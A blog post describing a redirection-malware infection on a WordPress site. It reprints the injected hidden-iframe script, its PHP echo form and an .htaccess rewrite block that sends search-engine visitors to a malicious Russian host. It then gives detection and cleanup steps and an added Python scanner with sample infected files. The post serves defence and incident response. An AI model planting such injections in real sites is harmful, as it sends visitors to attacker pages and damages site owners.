encountered a malware on a site

It's the 6th day: one of the sites I have been contributing to as an author has been compromised by a cracker out there. The cracker is supposed to be Russian. The malware is a redirection malware and, according to current statistics, it has compromised a total of 92 websites. The malware can infect any website but is mostly capable of compromising WordPress websites.

The script injected by the malware is as follows:
<script type="text/javascript" language="javascript" >
(function () {
    // builds a 1x1 pixel, absolutely positioned iframe so the visitor never sees it
    var jeit = document.createElement('iframe');
    jeit.src = 'http://nylzudwo.ru/count13.php';
    jeit.style.position = 'absolute';
    jeit.style.border = '0';
    jeit.style.height = '1px';
    jeit.style.width = '1px';
    jeit.style.left = '1px';
    jeit.style.top = '1px';
    // attaches the iframe inside a div with id "jeit", once per page
    if (!document.getElementById('jeit')) {
        document.write('<div id=\'jeit\'></div>');
        document.getElementById('jeit').appendChild(jeit);
    }
})();
</script>
In PHP files it is seen as a single echo line, padded with long runs of spaces (the padding is trimmed and the string wrapped here):
echo "<script type=\"text/javascript\" language=\"javascript\" >
(function () {
    var jeit = document.createElement('iframe');
    jeit.src = 'http://nylzudwo.ru/count13.php';
    jeit.style.position = 'absolute';
    jeit.style.border = '0';
    jeit.style.height = '1px';
    jeit.style.width = '1px';
    jeit.style.left = '1px';
    jeit.style.top = '1px';
    if (!document.getElementById('jeit')) {
        document.write('<div id=\'jeit\'></div>');
        document.getElementById('jeit').appendChild(jeit);
    }
})();</script>";
The main infected files are index.php and index.html. The .htaccess file can also be infected; it gets these lines added (the injected block is wrapped in #e2aa4e# ... #/e2aa4e# markers):
#e2aa4e#
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(abacho|abizdirectory|about|acoon|alexana|allesklar|allpages|allthesites|alltheuk|alltheweb|altavista|america|amfibi|aol|apollo7|aport|arcor|ask|atsearch|baidu|bellnet|bestireland|bhanvad|bing|blog|bluewin|botw|brainysearch|bricabrac|browseireland|chapu|claymont|click4choice|clickey|clickz|clush|confex|cyber-content|daffodil|devaro|dmoz|dogpile|ebay|ehow|eniro|entireweb|euroseek|exalead|excite|express|facebook|fastbot|filesearch|findelio|findhow|finditireland|findloo|findwhat|finnalle|finnfirma|fireball|flemiro|flickr|freenet|friendsreunited|galaxy|gasta|gigablast|gimpsy|globalsearchdirectory|goo|google|goto|gulesider|hispavista|hotbot|hotfrog|icq|iesearch|ilse|infoseek|ireland-information|ixquick|jaan|jayde|jobrapido|kataweb|keyweb|kingdomseek|klammeraffe|km|kobala|kompass|kpnvandaag|kvasir|libero|limier|linkedin|live|liveinternet|lookle|lycos|mail|mamma|metabot|metacrawler|metaeureka|mojeek|msn|myspace|netscape|netzindex|nigma|nlsearch|nol9|oekoportal|openstat|orange|passagen|pocketflier|qp|qq|rambler|rtl|savio|schnellsuche|search|search-belgium|searchers|searchspot|sfr|sharelook|simplyhired|slider|sol|splut|spray|startpagina|startsiden|sucharchiv|suchbiene|suchbot|suchknecht|suchmaschine|suchnase|sympatico|telfort|telia|teoma|terra|the-arena|thisisouryear|thunderstone|tiscali|t-online|topseven|twitter|ukkey|uwe|verygoodsearch|vkontakte|voila|walhello|wanadoo|web|webalta|web-archiv|webcrawler|websuche|westaustraliaonline|wikipedia|wisenut|witch|wolong|ya|yahoo|yandex|yell|yippy|youtube|zoneru)\.(.*)
RewriteRule ^(.*)$ http://nylzudwo.ru/count13.php [R=301,L]
</IfModule>
#/e2aa4e#
Note that the RewriteCond only matches when the visitor's HTTP_REFERER names one of the listed search engines or social sites, so visitors arriving from those sites are sent with a 301 to the attacker's page while someone typing the address directly is not redirected, which is one reason the site owner may not notice the infection.
Because of this malware, your domain will be blacklisted by Google Safe Browsing, and because of the blacklisting your visitors will get the warning screen shown in the above image.
How to detect if your website has been compromised with this malware:

  1. Scan your website at http://sitecheck.sucuri.net/scanner/
  2. Scan your website at http://evuln.com/tools/malware-scanner/
  3. Go to https://www.google.com/webmasters/tools
  4. Add your site if you have not already added it.
  5. If your site is infected, you should see "Severe health issues are found on your site. – Check site health".

The steps that can be taken to be safe from it are:

  1. Upgrade WordPress themes/plugins.
  2. Use properly verified third-party plugins/themes.

If infected, just remove the malware code and use Google Webmaster Tools to ask Google to review your domain and remove it from the blacklist. Steps to put in a request for review:

  1. Click on "Check site health", then click on "Malware detected"; you will then see a button for "Request a review".
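The following is an added example and not code from the post: a small Python scanner and cleaner built around the three forms of the injection quoted above (the #e2aa4e# markers in .htaccess, the echo line in PHP files, the raw <script> block in HTML), plus a function that mirrors the injected RewriteCond so you can see for which referrers the redirect fires. The regexes, function names and the sample files are my own constructions; only the host name, the markers and the shape of the injected code come from the post. The redirect check uses a subset of the referrer names from the full list above.

```python
"""Added example (not from the post): find and strip the nylzudwo.ru injection in
index.php, index.html and .htaccess, and mirror the RewriteCond that decides who is
redirected. Indicator strings come from the code quoted in the post; the sample
files at the bottom are constructed for this demonstration."""
import re
from pathlib import Path

MALICIOUS_HOST = "nylzudwo.ru"

# .htaccess: everything between the #e2aa4e# ... #/e2aa4e# markers, plus its trailing newline.
HTACCESS_BLOCK = re.compile(r"#e2aa4e#.*?#/e2aa4e#[ \t]*\r?\n?", re.DOTALL)

# PHP: one space-padded line of the form   echo "   <script ...>(function () { ... })();</script>";
PHP_ECHO_LINE = re.compile(
    r"^[ \t]*echo\s+\".*?" + re.escape(MALICIOUS_HOST) + r".*?</script>\";[ \t]*(?:\r?\n|$)",
    re.MULTILINE,
)

# HTML: the raw <script> block that creates the hidden 1x1 iframe.
HTML_SCRIPT = re.compile(
    r"<script[^>]*>\s*\(function\s*\(\)\s*\{.*?" + re.escape(MALICIOUS_HOST)
    + r".*?\}\)\(\);\s*</script>",
    re.DOTALL,
)

# Order matters: the PHP rule strips the whole echo line before the HTML rule sees it.
SIGNATURES = [
    ("htaccess-rewrite", HTACCESS_BLOCK),
    ("php-echo", PHP_ECHO_LINE),
    ("html-iframe", HTML_SCRIPT),
]
TARGET_NAMES = {"index.php", "index.html", ".htaccess"}  # file names the post reports as infected


def clean(text: str) -> tuple[str, list[str]]:
    """Strip every known injection from text; return (cleaned text, names of rules that fired)."""
    fired = []
    for name, pattern in SIGNATURES:
        text, count = pattern.subn("", text)
        if count:
            fired.append(name)
    return text, fired


def scan_tree(root: Path, fix: bool = False) -> dict[str, list[str]]:
    """Walk a web root (themes and plugins included); with fix=True write cleaned files back."""
    report: dict[str, list[str]] = {}
    for path in root.rglob("*"):
        if path.name not in TARGET_NAMES or not path.is_file():
            continue
        original = path.read_text(encoding="utf-8", errors="replace")
        cleaned, fired = clean(original)
        if fired:
            report[str(path.relative_to(root))] = fired
            if fix:
                path.write_text(cleaned, encoding="utf-8")
    return report


# Subset of the referrer names from the injected RewriteCond (the post quotes the full list).
REFERER_TOKENS = ("google", "bing", "yahoo", "yandex", "facebook", "twitter", "search", "web", "mail")
REFERER_COND = re.compile(r"^.*(" + "|".join(REFERER_TOKENS) + r")\.(.*)")


def referer_is_redirected(referer: str) -> bool:
    """Mirror the RewriteCond: the 301 fires only when HTTP_REFERER names a listed site,
    so a direct visit (empty referer) is served normally and the owner sees nothing wrong."""
    return REFERER_COND.match(referer) is not None


# Constructed sample files carrying the three forms of the injection.
SAMPLE_HTACCESS = (
    "#e2aa4e#<IfModule mod_rewrite.c>RewriteEngine OnRewriteCond %{HTTP_REFERER} "
    "^.*(google|bing)\\.(.*)RewriteRule ^(.*)$ http://nylzudwo.ru/count13.php [R=301,L]"
    "</IfModule>\n#/e2aa4e#\nRewriteEngine On\nRewriteRule ^old$ /new [R=301,L]\n"
)
SAMPLE_PHP = (
    "<?php\n"
    'echo "      <script type=\\"text/javascript\\" language=\\"javascript\\" >'
    "(function () { var jeit = document.createElement('iframe'); "
    "jeit.src = 'http://nylzudwo.ru/count13.php'; "
    "if (!document.getElementById('jeit')) { document.write('<div id=\\'jeit\\'></div>'); "
    "document.getElementById('jeit').appendChild(jeit); }})();</script>\";\n"
    "get_header();\n"
)
SAMPLE_HTML = (
    "<html><body><p>Hello</p>\n"
    '<script type="text/javascript" language="javascript" >(function () { '
    "var jeit = document.createElement('iframe'); jeit.src = 'http://nylzudwo.ru/count13.php'; "
    "jeit.style.height = '1px'; document.body.appendChild(jeit); })();</script>\n"
    "</body></html>\n"
)

if __name__ == "__main__":
    for label, sample in (("htaccess", SAMPLE_HTACCESS), ("php", SAMPLE_PHP), ("html", SAMPLE_HTML)):
        cleaned, fired = clean(sample)
        print(f"{label}: rules fired {fired}; {len(sample) - len(cleaned)} bytes removed")
    for ref in ("", "https://www.google.com/search?q=site", "https://example.org/"):
        print(f"referer {ref!r}: redirected={referer_is_redirected(ref)}")
```

Run scan_tree(Path("/path/to/webroot")) first to get a report, then scan_tree(..., fix=True) on a copy or after taking a backup; afterwards re-check with the scanners listed above and request the review in Google Webmaster Tools. The referer check is the part worth understanding: because the rewrite only triggers for visitors coming from the listed search engines and social sites, opening the site directly shows nothing unusual, which is why the external scanners and the Safe Browsing warning are often the first sign.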
